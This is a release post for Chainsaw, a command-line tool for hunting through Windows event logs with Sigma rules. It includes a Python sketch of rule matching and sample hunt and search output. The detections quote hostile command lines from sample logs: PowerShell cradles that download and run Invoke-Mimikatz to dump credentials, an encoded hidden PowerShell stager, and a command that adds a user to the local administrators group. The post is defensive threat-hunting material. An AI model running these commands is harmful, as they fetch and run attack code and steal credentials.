Chainsaw

Rapidly Hunt and Search Through Windows Event Logs

GitHub Repository: https://github.com/Countercept/chainsaw

The tool we are releasing today – Chainsaw – provides blue teams with a powerful first-response capability to quickly identify threats within event logs. Chainsaw is a command-line tool that provides a fast method of running Sigma rule detection logic over event log data to highlight suspicious entries. Chainsaw also contains built-in logic for detection use-cases that are not suitable for Sigma rules, and provides a simple interface to search through event logs by keyword, regex pattern, or for specific event IDs.

Background

Windows event logs provide a rich source of forensic information for threat hunting and incident response investigations. Unfortunately, processing and searching through event logs can be a slow and time-consuming process, and in most cases requires the overhead of surrounding infrastructure – such as an ELK stack or Splunk instance – to hunt efficiently through the log data and apply detection logic. This overhead often means that blue teams are unable to quickly triage Windows event logs to provide the direction and conclusions required to progress their investigations.

At F-Secure Countercept, we ingest a wide range of telemetry sources from endpoints via our EDR agent to provide our managed detection and response service. However, there are circumstances where we need to quickly analyze event log data that hasn’t been captured by our EDR, a common example being incident response investigations on an estate where our EDR wasn’t installed at the time of the compromise. Chainsaw was created to provide our threat hunters and incident response consultants with a tool to perform rapid triage of Windows event logs in these circumstances.

At the time of writing, there are very few open-source, standalone tools that provide a simple and fast method of triaging Windows event logs, identifying interesting elements within the logs and applying a detection logic rule format (such as Sigma) to detect signs of malicious activity. In our testing, the tools that did exist struggled to efficiently apply detection logic to large volumes of event logs, making them unsuitable for scenarios where quick triage is required.

Chainsaw Overview

Chainsaw is written completely in Rust and utilizes both the EVTX parser library provided by @obenamram to load and convert event log files to JSON, and our tau-engine library written by @AlexKornitzer to match the logic patterns from Sigma detection rules against event log data.

Key Features

Chainsaw provides a range of searching and hunting features which aim to help threat hunters and incident response teams detect suspicious event log entries to aid in their investigations. The key features include:

  • Search through event logs by event ID, keyword, and regex patterns
  • Extraction and parsing of Windows Defender, F-Secure, Sophos, and Kaspersky AV alerts
  • Detection of key event logs being cleared, or the event log service being stopped
  • Users being created or added to sensitive user groups
  • Brute-force of local user accounts
  • RDP logins, network logins etc.
  • Sigma rule detection against a wide variety of Windows event IDs, including:
      Event Type                      Event ID
      Process Creation (Sysmon)       1
      Network Connections (Sysmon)    3
      Image Loads (Sysmon)            7
      File Creation (Sysmon)          11
      Registry Events (Sysmon)        13
      PowerShell Script Blocks        4104
      Process Creation                4688
      Scheduled Task Creation         4698
      Service Creation                7045
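To make the hunt step concrete, here is an added example (not Chainsaw's or tau-engine's code) of the core idea: a Sigma-style selection/condition block matched against EVTX-as-JSON records through a field mapping, which is the role the --mapping file plays in the hunt command. The mapping, rule and records are constructed; the record layout follows the Event.System / Event.EventData shape of the search output further down, and the condition evaluator handles flat and/or/not conditions only (no parentheses).

```python
# Constructed mapping: Sigma field name -> dotted path in the EVTX JSON record.
FIELD_MAP = {
    "EventID": "Event.System.EventID",
    "CommandLine": "Event.EventData.CommandLine",
    "Image": "Event.EventData.NewProcessName",
}
# Constructed rule, laid out as a Sigma detection/condition block loads from YAML.
RULE = {
    "detection": {
        "selection": {
            "EventID": 4688,
            "CommandLine|contains|all": ["IEX", "DownloadString"],
        },
        "filter": {"Image|endswith": "\\explorer.exe"},
        "condition": "selection and not filter",
    },
}
# Constructed records in the Event.System / Event.EventData shape of the search output.
RECORDS = [
    {"Event": {"System": {"EventID": 4688}, "EventData": {
        "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""}}},
    {"Event": {"System": {"EventID": 4688}, "EventData": {
        "NewProcessName": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe report.txt"}}},
    # The same cradle as a Sysmon event (ID 1, field Image): a rule written for 4688 must not fire on it.
    {"Event": {"System": {"EventID": 1}, "EventData": {
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe \"IEX (New-Object Net.WebClient).DownloadString('x')\""}}},
]

def get_path(record, path):
    # Walk a dotted path into the nested record; None when any key is missing.
    for key in path.split("."):
        record = record.get(key) if isinstance(record, dict) else None
    return record

def value_matches(actual, expected, modifiers):
    # Sigma string matching is case-insensitive; a value without a modifier is an exact match.
    if actual is None:
        return False
    a, e = str(actual).lower(), str(expected).lower()
    ops = {"contains": e in a, "startswith": a.startswith(e), "endswith": a.endswith(e)}
    return next((ops[m] for m in modifiers if m in ops), a == e)

def selection_matches(record, selection):
    # Every field spec in a selection map must hold; a list of values is OR unless |all.
    for spec, expected in selection.items():
        field, *mods = spec.split("|")
        actual = get_path(record, FIELD_MAP.get(field, field))
        wanted = expected if isinstance(expected, list) else [expected]
        hits = [value_matches(actual, v, mods) for v in wanted]
        if not (all(hits) if "all" in mods else any(hits)):
            return False
    return True

def eval_condition(cond, lookup):
    # Flat 'a and not b or c' conditions (no parentheses), precedence not > and > or.
    clauses = [c.split(" and ") for c in cond.split(" or ")]
    term = lambda t: not lookup(t[4:]) if t.startswith("not ") else lookup(t)
    return any(all(term(t) for t in clause) for clause in clauses)

def hunt(records, rule):
    # Return the records the rule fires on, as the hunt subcommand would report them.
    det = rule["detection"]
    return [r for r in records if eval_condition(det["condition"], lambda n, r=r: selection_matches(r, det[n]))]
```

Only the first record fires: the second lacks the cradle and the third is a Sysmon event whose ID and field names the rule was not written for, which is why the mapping file has to be matched to the log source being hunted.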

Usage Example #1 - Hunting

-> % ./chainsaw hunt ./samples --rules ./rules/sigma_rules --mapping ./mapping_files/sigma-mapping.yml --json detections.json

 ██████╗██╗  ██╗ █████╗ ██╗███╗   ██╗███████╗ █████╗ ██╗    ██╗
██╔════╝██║  ██║██╔══██╗██║████╗  ██║██╔════╝██╔══██╗██║    ██║
██║     ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║
██║     ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║
╚██████╗██║  ██║██║  ██║██║██║ ╚████║███████║██║  ██║╚███╔███╔╝
 ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝ ╚══╝╚══╝
    By F-Secure Countercept (Author: @FranticTyping)

[+] Found 20 EVTX files
[+] Loaded 726 detection rules (72 could not be converted)
[+] Printing results to screen
[+] Saving results to: detections.json
[+] Hunting: [========================================] 20/20

[+] Detection: (Built-in Logic) - Security audit log was cleared
┌─────────────────────┬──────┬───────────────────┬──────────────┐
│     system_time     │  id  │     computer      │ subject_user │
├─────────────────────┼──────┼───────────────────┼──────────────┤
│ 2019-05-03 15:20:20 │ 1102 │ "SANS-TBT570"     │ "student"    │
└─────────────────────┴──────┴───────────────────┴──────────────┘

[+] Detection: (External Rule) - Suspicious Service Installed
┌─────────────────────┬──────┬────────────────────────────┬───────────────┬──────────────────────────────────────────┬──────────────────┐
│     system_time     │  id  │      detection_rules       │ computer_name │        Event.EventData.ImagePath         │   service_name   │
├─────────────────────┼──────┼────────────────────────────┼───────────────┼──────────────────────────────────────────┼──────────────────┤
│ 2016-08-18 20:40:21 │ 7045 │ ‣ Mimikatz Command Line    │ "IE10Win7"    │ %COMSPEC% /b /c start /b /min powershell │ SYyGmEHvgHiGYApk │
│                     │      │ ‣ FromBase64String Command │               │ .exe -nop -w hidden -c if([IntPtr]::Size │                  │
│                     │      │ Line                       │               │  -eq 4){$b='powershell.exe'}else{$b=$env │                  │
│                     │      │ ‣ Encoded FromBase64String │               │ :windir+'\syswow64\WindowsPowerShell\v1. │                  │
│                     │      │ ‣ Encoded IEX              │               │ 0\powershell.exe'};$s=New-Object System. │                  │
│                     │      │                            │               │ Diagnostics.ProcessStartInfo;$s.FileName │                  │
│                     │      │                            │               │ =$b;$s.Arguments='-nop -w hidden -c $s=N │                  │
│                     │      │                            │               │ ew-Object IO.MemoryStream(,[Convert]::Fr │                  │
│                     │      │                            │               │ omBase64String(''H4sIADQdtlcCA7VWa2/aSBT │                  │
│                     │      │                            │               │ 93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2T │                  │
│                     │      │                            │               │ sIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/I │                  │
│                     │      │                            │               │ tQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98wa │                  │
│                     │      │                            │               │ GM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d │                  │
│                     │      │                            │               │ +rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N │                  │
│                     │      │                            │               │ 1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5T │                  │
│                     │      │                            │               │ V+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLl │                  │
│                     │      │                            │               │ NrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPA │                  │
│                     │      │                            │               │ LiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0r │                  │
│                     │      │                            │               │ GjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32a │                  │
│                     │      │                            │               │ kT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39 │                  │
│                     │      │                            │               │ Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+v │                  │
│                     │      │                            │               │ N/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3 │                  │
│                     │      │                            │               │ jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEc │                  │
│                     │      │                            │               │ Sn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPI │                  │
│                     │      │                            │               │ r3onDyPHAudSsA9g...                      │                  │
│                     │      │                            │               │                                          │                  │
│                     │      │                            │               │ (use --full to show all content)         │                  │
└─────────────────────┴──────┴────────────────────────────┴───────────────┴──────────────────────────────────────────┴──────────────────┘

[+] Detection: (External Rule) - Suspicious Command Line
┌─────────────────────┬──────┬─────────────────────────────────┬───────────────┬──────────────────────────────────────────┬──────────────────────────────────────────┐
│     system_time     │  id  │         detection_rules         │ computer_name │       Event.EventData.CommandLine        │               process_name               │
├─────────────────────┼──────┼─────────────────────────────────┼───────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤
│ 2016-08-18 20:24:48 │ 4688 │ ‣ Rundll32 Without Parameters   │ "IE10Win7"    │ rundll32.exe                             │ C:\Windows\System32\rundll32.exe         │
├─────────────────────┼──────┼─────────────────────────────────┼───────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤
│ 2016-08-18 20:40:21 │ 4688 │ ‣ Mimikatz Command Line         │ "IE10Win7"    │ C:\Windows\system32\cmd.exe /b /c start  │ C:\Windows\System32\cmd.exe              │
│                     │      │ ‣ FromBase64String Command      │               │ /b /min powershell.exe -nop -w hidden -c │                                          │
│                     │      │ Line                            │               │  if([IntPtr]::Size -eq 4){$b='powershell │                                          │
│                     │      │ ‣ Encoded FromBase64String      │               │ .exe'}else{$b=$env:windir+'\syswow64\Win │                                          │
│                     │      │ ‣ Encoded IEX                   │               │ dowsPowerShell\v1.0\powershell.exe'};$s= │                                          │
│                     │      │                                 │               │ New-Object System.Diagnostics.ProcessSta │                                          │
│                     │      │                                 │               │ rtInfo;$s.FileName=$b;$s.Arguments='-nop │                                          │
│                     │      │                                 │               │  -w hidden -c $s=New-Object IO.MemoryStr │                                          │
│                     │      │                                 │               │ eam(,[Convert]::FromBase64String(''H4sIA │                                          │
│                     │      │                                 │               │ DQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVd │                                          │
│                     │      │                                 │               │ szLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpda │                                          │
│                     │      │                                 │               │ S2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJ │                                          │
│                     │      │                                 │               │ ykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebT │                                          │
│                     │      │                                 │               │ YV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njF │                                          │
│                     │      │                                 │               │ QnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3Pt │                                          │
│                     │      │                                 │               │ biFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8n │                                          │
│                     │      │                                 │               │ M2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHd │                                          │
│                     │      │                                 │               │ GC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNu │                                          │
│                     │      │                                 │               │ IVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMC │                                          │
│                     │      │                                 │               │ xLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqK │                                          │
│                     │      │                                 │               │ wI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fv │                                          │
│                     │      │                                 │               │ XXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUh │                                          │
│                     │      │                                 │               │ p2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RS │                                          │
│                     │      │                                 │               │ O3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3 │                                          │
│                     │      │                                 │               │ irEoT6p7H3sUSuVl...                      │                                          │
│                     │      │                                 │               │                                          │                                          │
│                     │      │                                 │               │ (use --full to show all content)         │                                          │
├─────────────────────┼──────┼─────────────────────────────────┼───────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤
│ 2016-08-27 15:32:35 │ 4688 │ ‣ Windows PowerShell Web        │ "IE10Win7"    │ C:\Windows\system32\WindowsPowerShell\v1 │ C:\Windows\System32\WindowsPowerShell\v1 │
│                     │      │ Request                         │               │ .0\powershell.exe "IEX (New-Object Net.W │ .0\powershell.exe                        │
│                     │      │ ‣ PowerShell Download from      │               │ ebClient).DownloadString('https://eic.me │                                          │
│                     │      │ URL                             │               │ /17'); Invoke-Mimikatz –DumpCreds"       │                                          │
│                     │      │ ‣ Encoded IEX                   │               │                                          │                                          │
├─────────────────────┼──────┼─────────────────────────────────┼───────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤
│ 2016-09-01 19:44:24 │ 4688 │ ‣ Net.exe Execution             │ "IE10Win7"    │ C:\Windows\system32\net1 localgroup admi │ C:\Windows\System32\net1.exe             │
│                     │      │                                 │               │ nistrators sec511 /add                   │                                          │
├─────────────────────┼──────┼─────────────────────────────────┼───────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤
│ 2016-09-20 18:45:24 │ 4688 │ ‣ Windows PowerShell Web        │ "IE10Win7"    │ powershell.exe "IEX (New-Object Net.WebC │ C:\Windows\System32\WindowsPowerShell\v1 │
│                     │      │ Request                         │               │ lient).DownloadString('https://raw.githu │ .0\powershell.exe                        │
│                     │      │ ‣ PowerShell Download from      │               │ busercontent.com/mattifestation/PowerSpl │                                          │
│                     │      │ URL                             │               │ oit/master/Exfiltration/Invoke-Mimikatz. │                                          │
│                     │      │ ‣ Encoded IEX                   │               │ ps1'); Invoke-Mimikatz -DumpCreds"       │                                          │
├─────────────────────┼──────┼─────────────────────────────────┼───────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤
│ 2016-09-21 03:41:02 │ 4688 │ ‣ Rundll32 Without Parameters   │ "IE10Win7"    │ rundll32.exe                             │ C:\Windows\System32\rundll32.exe         │
└─────────────────────┴──────┴─────────────────────────────────┴───────────────┴──────────────────────────────────────────┴──────────────────────────────────────────┘

[+] Detection: (Built-in Logic) - New User Created
┌─────────────────────┬──────┬───────────┬─────────────────┬──────────────────────────────────────────────────┐
│     system_time     │  id  │ computer  │ target_username │                     user_sid                     │
├─────────────────────┼──────┼───────────┼─────────────────┼──────────────────────────────────────────────────┤
│ 2013-10-23 16:22:39 │ 4720 │ "IE8Win7" │ "IEUser"        │ "S-1-5-21-3463664321-2923530833-3546627382-1000" │
└─────────────────────┴──────┴───────────┴─────────────────┴──────────────────────────────────────────────────┘

[+] Detection: (Built-in Logic) - User added to interesting group
┌─────────────────────┬──────┬───────────┬───────────────────────────┬──────────────────────────────────────────────────┬──────────────────┐
│     system_time     │  id  │ computer  │        change_type        │                     user_sid                     │   target_group   │
├─────────────────────┼──────┼───────────┼───────────────────────────┼──────────────────────────────────────────────────┼──────────────────┤
│ 2013-10-23 16:22:40 │ 4732 │ "IE8Win7" │ User added to local group │ "S-1-5-21-3463664321-2923530833-3546627382-1000" │ "Administrators" │
└─────────────────────┴──────┴───────────┴───────────────────────────┴──────────────────────────────────────────────────┴──────────────────┘

[+] Detection: (Built-in Logic) - System log was cleared
┌─────────────────────┬─────┬───────────────────┬──────────────┐
│     system_time     │ id  │     computer      │ subject_user │
├─────────────────────┼─────┼───────────────────┼──────────────┤
│ 2019-04-27 21:04:25 │ 104 │ "DESKTOP-JR78RLP" │ "jwrig"      │
└─────────────────────┴─────┴───────────────────┴──────────────┘

[+] Detection: (Built-in Logic) - Event Log Service Stopped
┌─────────────────────┬──────┬───────────────────┬─────────────────────┬────────────┐
│     system_time     │  id  │     computer      │    service_name     │   status   │
├─────────────────────┼──────┼───────────────────┼─────────────────────┼────────────┤
│ 2019-04-27 21:04:51 │ 7040 │ "DESKTOP-JR78RLP" │ "Windows Event Log" │ "disabled" │
└─────────────────────┴──────┴───────────────────┴─────────────────────┴────────────┘

[+] Detection: (Built-in Logic) - Account Brute Forcing
┌──────┬─────────────────┬────────────────────┐
│  id  │    username     │ failed_login_count │
├──────┼─────────────────┼────────────────────┤
│ 4625 │ "Administrator" │ 3560               │
└──────┴─────────────────┴────────────────────┘

[+] Detections saved to: detections.json

Usage Example #2 - Searching

-> % ./chainsaw search ./samples/subset/ -i -s "mimikatz"

 ██████╗██╗  ██╗ █████╗ ██╗███╗   ██╗███████╗ █████╗ ██╗    ██╗
██╔════╝██║  ██║██╔══██╗██║████╗  ██║██╔════╝██╔══██╗██║    ██║
██║     ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║
██║     ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║
╚██████╗██║  ██║██║  ██║██║██║ ╚████║███████║██║  ██║╚███╔███╔╝
 ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝ ╚══╝╚══╝
    By F-Secure Countercept (Author: @FranticTyping)

[+] Found 20 EVTX files
[+] Printing results to the screen
[+] Searching: [==>-------------------------------------] 1/20 ⠼

{
  "Event": {
    "#attributes": {
      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
    },
    "EventData": {
      "CommandLine": "powershell.exe  \"IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds\"",
      "NewProcessId": "0xdb8",
      "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "ProcessId": "0x80c",
      "SubjectDomainName": "IE10WIN7",
      "SubjectLogonId": "0x6590f",
      "SubjectUserName": "IEUser",
      "SubjectUserSid": "S-1-5-21-3463664321-2923530833-3546627382-1000",
      "TokenElevationType": "%%1937"
    },
    "System": {
      "Channel": "Security",
      "Computer": "IE10Win7",
      "Correlation": null,
      "EventID": 4688,
      "EventRecordID": 12989,
      "Execution": {
        "#attributes": {
          "ProcessID": 4,
          "ThreadID": 64
        }
      },
      "Keywords": "0x8020000000000000",
      "Level": 0,
      "Opcode": 0,
      "Provider": {
        "#attributes": {
          "Guid": "54849625-5478-4994-A5BA-3E3B0328C30D",
          "Name": "Microsoft-Windows-Security-Auditing"
        }
      },
      "Security": null,
      "Task": 13312,
      "TimeCreated": {
        "#attributes": {
          "SystemTime": "2016-09-20T00:20:56.173828Z"
        }
      },
      "Version": 1
    }
  }

<SNIP>

[+] Searching: [========================================] 20/20
[+] Found 30 matching log entries